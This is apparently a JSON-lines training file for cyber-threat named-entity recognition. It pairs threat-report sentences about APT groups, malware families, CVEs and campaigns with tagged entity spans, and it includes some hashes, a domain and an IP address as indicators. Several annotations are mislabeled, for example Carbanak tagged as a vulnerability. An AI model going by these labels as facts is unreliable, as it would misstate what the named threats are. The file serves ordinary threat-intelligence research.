{"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": {"MALWARE: exploit document": [[163, 179]], "TOOL: KeyBoy": [[204, 210]], "MALWARE: decoy document": [[237, 251]], "MALWARE: ELMER": [[452, 457]]}, "info": {"id": "cyberner_stix_train_006491", "source": "cyberner_stix_train"}}
{"text": "] infokalisi [ . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization . In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim ’s authentication credentials or cookies with a “ man - in - the - middle \" attack .", "spans": {"ORGANIZATION: Palo Alto Networks WildFire": [[31, 58]], "ORGANIZATION: industrial organization": [[183, 206]], "TOOL: HTRAN": [[270, 275]], "THREAT_ACTOR: the attacker": [[333, 345]]}, "info": {"id": "cyberner_stix_train_006492", "source": "cyberner_stix_train"}}
{"text": "Once the file is unpacked , the backdoor is dropped in two different locations on the infected operating system :", "spans": {}, "info": {"id": "cyberner_stix_train_006493", "source": "cyberner_stix_train"}}
{"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"VULNERABILITY: Carbanak": [[32, 40]], "VULNERABILITY: CVE-2013-3660": [[209, 222]], "ORGANIZATION: Kaspersky": [[258, 267]], "THREAT_ACTOR: ScarCruft": [[284, 293]], "VULNERABILITY: zero-day": [[323, 331]], "VULNERABILITY: CVE-2016-0147": [[334, 347]], "ORGANIZATION: Microsoft": [[369, 378]], "TOOL: XML": [[379, 382]]}, "info": {"id": "cyberner_stix_train_006494", "source": "cyberner_stix_train"}}
{"text": "Update and patch production servers regularly .", "spans": {}, "info": {"id": "cyberner_stix_train_006495", "source": "cyberner_stix_train"}}
{"text": "That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": {"MALWARE: JAR": [[167, 170]], "TOOL: Order_2018.jar": [[231, 245]], "MALWARE: installers": [[285, 295]], "MALWARE: uninstallers": [[298, 310]], "ORGANIZATION: Novetta": [[323, 330]], "THREAT_ACTOR: Lazarus Group": [[348, 361]]}, "info": {"id": "cyberner_stix_train_006496", "source": "cyberner_stix_train"}}
{"text": "The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading . NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers . The group has been attributed to the Chinese People ’s Liberation Army ’s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": {"ORGANIZATION: NTG’s": [[126, 131]], "THREAT_ACTOR: NewsBeef’s": [[170, 180]], "ORGANIZATION: Chinese People ’s Liberation Army ’s": [[302, 338]], "ORGANIZATION: PLA": [[341, 344]], "ORGANIZATION: Chengdu Military Region Second Technical Reconnaissance Bureau": [[347, 409]], "ORGANIZATION: Military Unit Cover Designator 78020": [[412, 448]]}, "info": {"id": "cyberner_stix_train_006497", "source": "cyberner_stix_train"}}
{"text": "The client receives and decrypts the packet .", "spans": {}, "info": {"id": "cyberner_stix_train_006498", "source": "cyberner_stix_train"}}
{"text": "Special focus will be on the samples that were used in targeted attacks against Ukrainian government organizations earlier this year . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"ORGANIZATION: government organizations": [[90, 114]], "ORGANIZATION: governments": [[272, 283]], "ORGANIZATION: militaries": [[288, 298]], "ORGANIZATION: defense attaches": [[301, 317]], "ORGANIZATION: media entities": [[320, 334]], "ORGANIZATION: dissidents": [[341, 351]], "ORGANIZATION: figures": [[356, 363]], "ORGANIZATION: Russian government": [[387, 405]]}, "info": {"id": "cyberner_stix_train_006499", "source": "cyberner_stix_train"}}
{"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "MALWARE: document files": [[106, 120]], "THREAT_ACTOR: attacker": [[188, 196]], "MALWARE: Blue Termite": [[303, 315]], "TOOL: emails": [[335, 341]]}, "info": {"id": "cyberner_stix_train_006500", "source": "cyberner_stix_train"}}
{"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"TOOL: DNSMessenger": [[153, 165]], "TOOL: MuddyWater": [[170, 180]], "VULNERABILITY: CVE-2022 - 41080": [[430, 446]], "VULNERABILITY: CVE-2022 - 41082": [[451, 467]]}, "info": {"id": "cyberner_stix_train_006501", "source": "cyberner_stix_train"}}
{"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "ORGANIZATION: FireEye Labs": [[32, 44]], "THREAT_ACTOR: Lotus Blossom": [[320, 333]], "ORGANIZATION: individual": [[368, 378]]}, "info": {"id": "cyberner_stix_train_006502", "source": "cyberner_stix_train"}}
{"text": "While analyzing hosts compromised by BRONZE PRESIDENT , CTU researchers identified other malware artifacts .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[37, 53]], "ORGANIZATION: CTU": [[56, 59]]}, "info": {"id": "cyberner_stix_train_006504", "source": "cyberner_stix_train"}}
{"text": "This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target .", "spans": {}, "info": {"id": "cyberner_stix_train_006505", "source": "cyberner_stix_train"}}
{"text": "backdoor , Sedreco , AZZY , Xagent , ADVSTORESHELL , NETUI .", "spans": {"MALWARE: Sedreco": [[11, 18]], "MALWARE: AZZY": [[21, 25]], "MALWARE: Xagent": [[28, 34]], "MALWARE: ADVSTORESHELL": [[37, 50]], "MALWARE: NETUI": [[53, 58]]}, "info": {"id": "cyberner_stix_train_006506", "source": "cyberner_stix_train"}}
{"text": "] Once launched , the app starts to communicate with its C & C server ( whose IP address is base64-encoded in the app ) . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": {"ORGANIZATION: Kaspersky": [[122, 131]], "ORGANIZATION: LuckyMouse": [[153, 163]]}, "info": {"id": "cyberner_stix_train_006507", "source": "cyberner_stix_train"}}
{"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe” with their CARBANAK payload .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: group": [[94, 99]], "ORGANIZATION: Mandiant": [[130, 138]], "THREAT_ACTOR: FIN7": [[153, 157]], "FILEPATH: services.exe”": [[234, 247]], "MALWARE: CARBANAK": [[259, 267]]}, "info": {"id": "cyberner_stix_train_006508", "source": "cyberner_stix_train"}}
{"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": {"ORGANIZATION: healthcare": [[172, 182]], "TOOL: Python": [[312, 318]]}, "info": {"id": "cyberner_stix_train_006509", "source": "cyberner_stix_train"}}
{"text": "For most of its history it operated as a government department or public corporation . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity . Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": {"ORGANIZATION: Insikt": [[87, 93]], "ORGANIZATION: Recorded Future": [[185, 200]], "THREAT_ACTOR: APT33’s": [[326, 333]], "THREAT_ACTOR: Subaat": [[420, 426]]}, "info": {"id": "cyberner_stix_train_006510", "source": "cyberner_stix_train"}}
{"text": "We can’t get hold of the final payload that ’s executed in memory , but we believe its backdoor-type malware is ultimately used to control the infected victim .", "spans": {}, "info": {"id": "cyberner_stix_train_006511", "source": "cyberner_stix_train"}}
{"text": "To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"THREAT_ACTOR: FIN7": [[66, 70]], "TOOL: PowerShell script": [[100, 117]], "MALWARE: sdbinst.exe": [[134, 145]], "THREAT_ACTOR: actor’s": [[240, 247]], "TOOL: emails": [[248, 254]], "FILEPATH: malicious payload": [[301, 318]], "ORGANIZATION: users": [[383, 388]]}, "info": {"id": "cyberner_stix_train_006512", "source": "cyberner_stix_train"}}
{"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . Perhaps it also points to the suspected North Korean origin of attack .", "spans": {"THREAT_ACTOR: group": [[5, 10]]}, "info": {"id": "cyberner_stix_train_006513", "source": "cyberner_stix_train"}}
{"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege . This file contains a list of IP addresses for the infected machine to connect back to . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"TOOL: PLEAD": [[148, 153]], "TOOL: KIVARS": [[158, 164]], "VULNERABILITY: a gap in the implementation of CSP , and even for sites that do use it correctly": [[451, 531]]}, "info": {"id": "cyberner_stix_train_006514", "source": "cyberner_stix_train"}}
{"text": "On the other hand , the network traffic generated by the .NET version is unencoded .", "spans": {"TOOL: .NET": [[57, 61]]}, "info": {"id": "cyberner_stix_train_006515", "source": "cyberner_stix_train"}}
{"text": "Here are some of the most notable : ‘ geofence ’ – this command adds a specified location to the implant ’ s internal database and when it matches a device ’ s current location the malware triggers and begins to record surrounding audio . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": {"THREAT_ACTOR: NewsBeef's": [[365, 375]], "ORGANIZATION: telecommunications": [[425, 443]], "ORGANIZATION: government": [[446, 456]], "ORGANIZATION: IT services": [[459, 470]], "ORGANIZATION: oil sectors": [[479, 490]]}, "info": {"id": "cyberner_stix_train_006516", "source": "cyberner_stix_train"}}
{"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . The library is only used to perform keylogging and clipboard stealing .", "spans": {"ORGANIZATION: Microstep Intelligence Bureau": [[236, 265]], "ORGANIZATION: Ukrainian government": [[317, 337]], "THREAT_ACTOR: Gamaredon": [[365, 374]]}, "info": {"id": "cyberner_stix_train_006517", "source": "cyberner_stix_train"}}
{"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 . Cybereason suspects this These ransom demands are significantly lower than those made by many well - known ransomware gangs like RYUK , Babuk , REvil , Conti , DarkSide , BlackMatter , BlackCat , and Yanluowang , which are typically in the millions of dollars .", "spans": {"ORGANIZATION: FireEye": [[260, 267]], "TOOL: TRITON": [[364, 370]], "TOOL: TRITON/TRISIS malware": [[408, 429]], "ORGANIZATION: Cybereason": [[450, 460]], "MALWARE: RYUK": [[579, 583]], "MALWARE: Babuk": [[586, 591]], "MALWARE: REvil": [[594, 599]], "MALWARE: Conti": [[602, 607]], "MALWARE: DarkSide": [[610, 618]], "MALWARE: BlackMatter": [[621, 632]], "MALWARE: BlackCat": [[635, 643]], "MALWARE: Yanluowang": [[650, 660]]}, "info": {"id": "cyberner_stix_train_006518", "source": "cyberner_stix_train"}}
{"text": "But in terms of features and behaviors , these two malware are very similar .", "spans": {}, "info": {"id": "cyberner_stix_train_006519", "source": "cyberner_stix_train"}}
{"text": "File Name : ati.exe .", "spans": {"FILEPATH: ati.exe": [[12, 19]]}, "info": {"id": "cyberner_stix_train_006520", "source": "cyberner_stix_train"}}
{"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism . In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses . The campaigns contain malicious web links and attachments that infect users machines with malware when opened .", "spans": {"MALWARE: XLoader 6.0": [[17, 28]], "MALWARE: FakeSpy": [[151, 158]], "THREAT_ACTOR: Wekby group": [[185, 196]], "TOOL: HTTPBrowser malware family": [[213, 239]]}, "info": {"id": "cyberner_stix_train_006521", "source": "cyberner_stix_train"}}
{"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": {"VULNERABILITY: Carbanak": [[38, 46]], "THREAT_ACTOR: attackers": [[47, 56]], "THREAT_ACTOR: VENOMOUS BEAR": [[172, 185]]}, "info": {"id": "cyberner_stix_train_006522", "source": "cyberner_stix_train"}}
{"text": "In addition to often embedding persistence or privilege escalation components , CosmicDuke has occasionally embedded PinchDuke , GeminiDuke , or MiniDuke components .", "spans": {"MALWARE: CosmicDuke": [[80, 90]], "MALWARE: PinchDuke": [[117, 126]], "MALWARE: GeminiDuke": [[129, 139]], "MALWARE: MiniDuke": [[145, 153]]}, "info": {"id": "cyberner_stix_train_006523", "source": "cyberner_stix_train"}}
{"text": "That creates a fake ID that allows the perpetrators to generate referral revenues . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": {"TOOL: wipers": [[126, 132]], "MALWARE: Stonedrill": [[227, 237]], "MALWARE: Trojan.Stonedrill": [[240, 257]], "MALWARE: NoEscape": [[366, 374]]}, "info": {"id": "cyberner_stix_train_006524", "source": "cyberner_stix_train"}}
{"text": "RuMMS samples , hosting sites , C2 servers from Jan. 2016 to Mar . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email . If a serial number exists , the rest of the code is executed . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"MALWARE: RuMMS": [[0, 5]], "THREAT_ACTOR: OilRig": [[77, 83]], "TOOL: OopsIE Trojan": [[118, 131]], "ORGANIZATION: CrowdStrike security researchers": [[273, 305]], "THREAT_ACTOR: Play ransomware attacks": [[433, 456]]}, "info": {"id": "cyberner_stix_train_006525", "source": "cyberner_stix_train"}}
{"text": "The macro then decodes a PowerShell script which downloads base64 encoded content from the pastebin url .", "spans": {"TOOL: macro": [[4, 9]], "TOOL: PowerShell": [[25, 35]], "TOOL: base64 encoded content": [[59, 81]], "TOOL: pastebin": [[91, 99]]}, "info": {"id": "cyberner_stix_train_006526", "source": "cyberner_stix_train"}}
{"text": "We do not know exactly how many people have been infected with RuMMS malware . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . Brief Description : SFX Archive First Stage . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": {"MALWARE: RuMMS": [[63, 68]], "ORGANIZATION: Kaspersky": [[102, 111]], "THREAT_ACTOR: Hack520": [[426, 433]], "THREAT_ACTOR: Winnti": [[467, 473]]}, "info": {"id": "cyberner_stix_train_006528", "source": "cyberner_stix_train"}}
{"text": "We have observed these actors using Tor or proxy-based tools similar to Tor (e.g , UltraSurf , as seen in Figure 2) . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"THREAT_ACTOR: actors": [[23, 29]], "TOOL: Tor": [[36, 39]], "TOOL: proxy-based tools": [[43, 60]], "THREAT_ACTOR: COBALT GYPSY": [[118, 130]], "ORGANIZATION: telecommunications": [[164, 182]], "ORGANIZATION: government": [[185, 195]], "ORGANIZATION: defense": [[198, 205]], "ORGANIZATION: oil": [[208, 211]], "ORGANIZATION: financial services organizations": [[218, 250]], "ORGANIZATION: individual victims": [[309, 327]], "ORGANIZATION: social media": [[336, 348]]}, "info": {"id": "cyberner_stix_train_006529", "source": "cyberner_stix_train"}}
{"text": "DHS and FBI recommend that network administrators review the IP S-PROT addresses , file hashes , network signatures , and YARA rules provided , and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "TOOL: IP S-PROT addresses": [[61, 80]], "TOOL: file hashes": [[83, 94]], "TOOL: network signatures": [[97, 115]], "TOOL: YARA": [[122, 126]], "TOOL: IPs": [[156, 159]]}, "info": {"id": "cyberner_stix_train_006530", "source": "cyberner_stix_train"}}
{"text": "non-Google Play ) app stores which often have fewer security and vetting procedures for the apps they host . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": {"SYSTEM: Play": [[11, 15]], "THREAT_ACTOR: APT41": [[109, 114]], "TOOL: ADORE.XSEC": [[125, 135]], "THREAT_ACTOR: APT33": [[269, 274]], "ORGANIZATION: oil refining": [[326, 338]], "ORGANIZATION: petrochemicals": [[343, 357]]}, "info": {"id": "cyberner_stix_train_006531", "source": "cyberner_stix_train"}}
{"text": "Method doInBackground : to send information to remote C2 server As seen from the major code body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a . The term has been around since the 1990s , and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices .", "spans": {"THREAT_ACTOR: group": [[318, 323]], "ORGANIZATION: telecommunications": [[459, 477]], "ORGANIZATION: defense industries": [[482, 500]], "THREAT_ACTOR: Gamaredon": [[503, 512]], "FILEPATH: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[515, 579]]}, "info": {"id": "cyberner_stix_train_006532", "source": "cyberner_stix_train"}}
{"text": "They can be configured to block data and applications from certain locations ( IP S-PROT whitelisting ) , while allowing relevant and necessary data through .", "spans": {"TOOL: IP S-PROT whitelisting": [[79, 101]]}, "info": {"id": "cyberner_stix_train_006533", "source": "cyberner_stix_train"}}
{"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": {"ORGANIZATION: Sumitomo Electric": [[189, 206]], "THREAT_ACTOR: Winnti": [[209, 215]], "THREAT_ACTOR: APT16": [[328, 333]], "ORGANIZATION: government agency": [[374, 391]], "MALWARE: ELMER backdoor": [[474, 488]]}, "info": {"id": "cyberner_stix_train_006534", "source": "cyberner_stix_train"}}
{"text": "Everyday users can do the same by checking the router ’ s DNS settings if they ’ ve been modified . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . While the name ‘ Winnti ’ in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": {"THREAT_ACTOR: Lazarus": [[100, 107]], "MALWARE: Winnti": [[191, 197], [413, 419]]}, "info": {"id": "cyberner_stix_train_006535", "source": "cyberner_stix_train"}}
{"text": "By the end of that month , CosmicDuke samples we found that had been compiled on the 30th of July had shed unused parts of their code that had essentially just been relics of the past .", "spans": {"MALWARE: CosmicDuke": [[27, 37]]}, "info": {"id": "cyberner_stix_train_006536", "source": "cyberner_stix_train"}}
{"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds . They then proceeded to log directly into the VPN using the credentials of the compromised user . The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system . ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) . Curl An opensource commandline tool for transferring data using various network protocols .", "spans": {"SYSTEM: windows": [[101, 108]], "TOOL: credentials of the compromised user": [[186, 221]], "TOOL: Curl": [[435, 439]]}, "info": {"id": "cyberner_stix_train_006537", "source": "cyberner_stix_train"}}
{"text": "These samples were identified as being the work of one group , referred to in this document as \" Quedagh \" , which has a history of targeting political organizations . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: group": [[55, 60]], "THREAT_ACTOR: Quedagh": [[97, 104]], "ORGANIZATION: political organizations": [[142, 165]], "ORGANIZATION: social engineering": [[178, 196]], "THREAT_ACTOR: actor": [[226, 231]], "ORGANIZATION: diaspora": [[310, 318]], "ORGANIZATION: government employees": [[343, 363]]}, "info": {"id": "cyberner_stix_train_006538", "source": "cyberner_stix_train"}}
{"text": "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation . Winnti : nw.infestexe.com 138.68.14.195 DigitalOcean . While there are several motivations for hackers , we ve covered 6 of the most common ones in this article", "spans": {"THREAT_ACTOR: APT40": [[286, 291]], "THREAT_ACTOR: Winnti": [[349, 355]], "DOMAIN: nw.infestexe.com": [[358, 374]], "IP_ADDRESS: 138.68.14.195": [[375, 388]], "ORGANIZATION: DigitalOcean": [[389, 401]], "THREAT_ACTOR: hackers": [[444, 451]]}, "info": {"id": "cyberner_stix_train_006539", "source": "cyberner_stix_train"}}
{"text": "At times , the use of this malware testing environment correlates to in-network activities of TEMP.Veles , demonstrating direct operational support for intrusion activity .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[94, 104]]}, "info": {"id": "cyberner_stix_train_006540", "source": "cyberner_stix_train"}}
{"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": {"VULNERABILITY: Janus": [[17, 22]], "THREAT_ACTOR: Patchwork": [[106, 115]], "VULNERABILITY: CVE-2015-1641": [[285, 298]], "VULNERABILITY: CVE-2017-11882": [[303, 317]], "MALWARE: Dexphot": [[366, 373]], "SYSTEM: a separate environment": [[496, 518]], "THREAT_ACTOR: a threat actor": [[533, 547]], "VULNERABILITY: the vulnerable Exchange Server": [[619, 649]]}, "info": {"id": "cyberner_stix_train_006541", "source": "cyberner_stix_train"}}
{"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe . The malware also contains a new component called Tonnerre French for thunder a secondstage payload used for persistence , surveillance , and data exfiltration .", "spans": {"THREAT_ACTOR: Lazarus Group": [[199, 212]], "MALWARE: malware": [[508, 515]], "MALWARE: Tonnerre": [[553, 561]], "MALWARE: secondstage payload": [[583, 602]]}, "info": {"id": "cyberner_stix_train_006542", "source": "cyberner_stix_train"}}
{"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host .", "spans": {"MALWARE: SPK KANUN": [[171, 180]], "MALWARE: CiscoAny.exe”": [[305, 318]], "THREAT_ACTOR: APT35": [[321, 326]], "MALWARE: custom backdoor": [[356, 371]]}, "info": {"id": "cyberner_stix_train_006543", "source": "cyberner_stix_train"}}
{"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates.vbs ” . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"THREAT_ACTOR: BlackOasis": [[104, 114]], "FILEPATH: templates.vbs": [[294, 307]], "ORGANIZATION: Bradshaw": [[317, 325]], "ORGANIZATION: he and his then - girlfriend": [[355, 383]]}, "info": {"id": "cyberner_stix_train_006544", "source": "cyberner_stix_train"}}
{"text": "the attacker did not leverage all of TRITON’s extensive reconnaissance capabilities . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "THREAT_ACTOR: TRITON’s": [[37, 45]], "FILEPATH: 32-bit Windows executable file": [[131, 161]], "MALWARE: Remote Access Trojan": [[180, 200]], "MALWARE: RAT": [[203, 206]]}, "info": {"id": "cyberner_stix_train_006545", "source": "cyberner_stix_train"}}
{"text": "Our findings , along with previous research , indicates that the threat actor behind these recent campaigns is likely a Chinese group dubbed “ Roaming Mantis ” . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": {"ORGANIZATION: Roaming Mantis": [[143, 157]], "THREAT_ACTOR: CobaltGoblin": [[180, 192]], "THREAT_ACTOR: Carbanak": [[193, 201]], "THREAT_ACTOR: EmpireMonkey": [[202, 214]], "ORGANIZATION: financial": [[302, 311]], "THREAT_ACTOR: Ke3chang": [[400, 408]], "ORGANIZATION: government": [[443, 453]]}, "info": {"id": "cyberner_stix_train_006546", "source": "cyberner_stix_train"}}
{"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer . The MuddyWater attacks are primarily against Middle Eastern nations . In Check Point ’s blog , the sample is from December 2018 while this sample is from April 2018 . What is Cisco doing to take action against the growth of commercial spyware ?", "spans": {"ORGANIZATION: Check Point": [[369, 380]], "ORGANIZATION: Cisco": [[471, 476]]}, "info": {"id": "cyberner_stix_train_006547", "source": "cyberner_stix_train"}}
{"text": "The New York Times reported on Nov. 15 that Kryptowire , a mobile enterprise security company , discovered the code on a lower-end smartphone made by BLU Products of Doral , Fla . Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut . The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user the password and decrypts the file .", "spans": {"ORGANIZATION: New York Times": [[4, 18]], "ORGANIZATION: Kryptowire": [[44, 54]], "ORGANIZATION: BLU": [[150, 153]], "THREAT_ACTOR: APT28’s": [[271, 278]], "TOOL: VPNFilter": [[279, 288]], "TOOL: cyber-berkut": [[334, 346]], "MALWARE: HomamDownloader": [[374, 389]]}, "info": {"id": "cyberner_stix_train_006548", "source": "cyberner_stix_train"}}
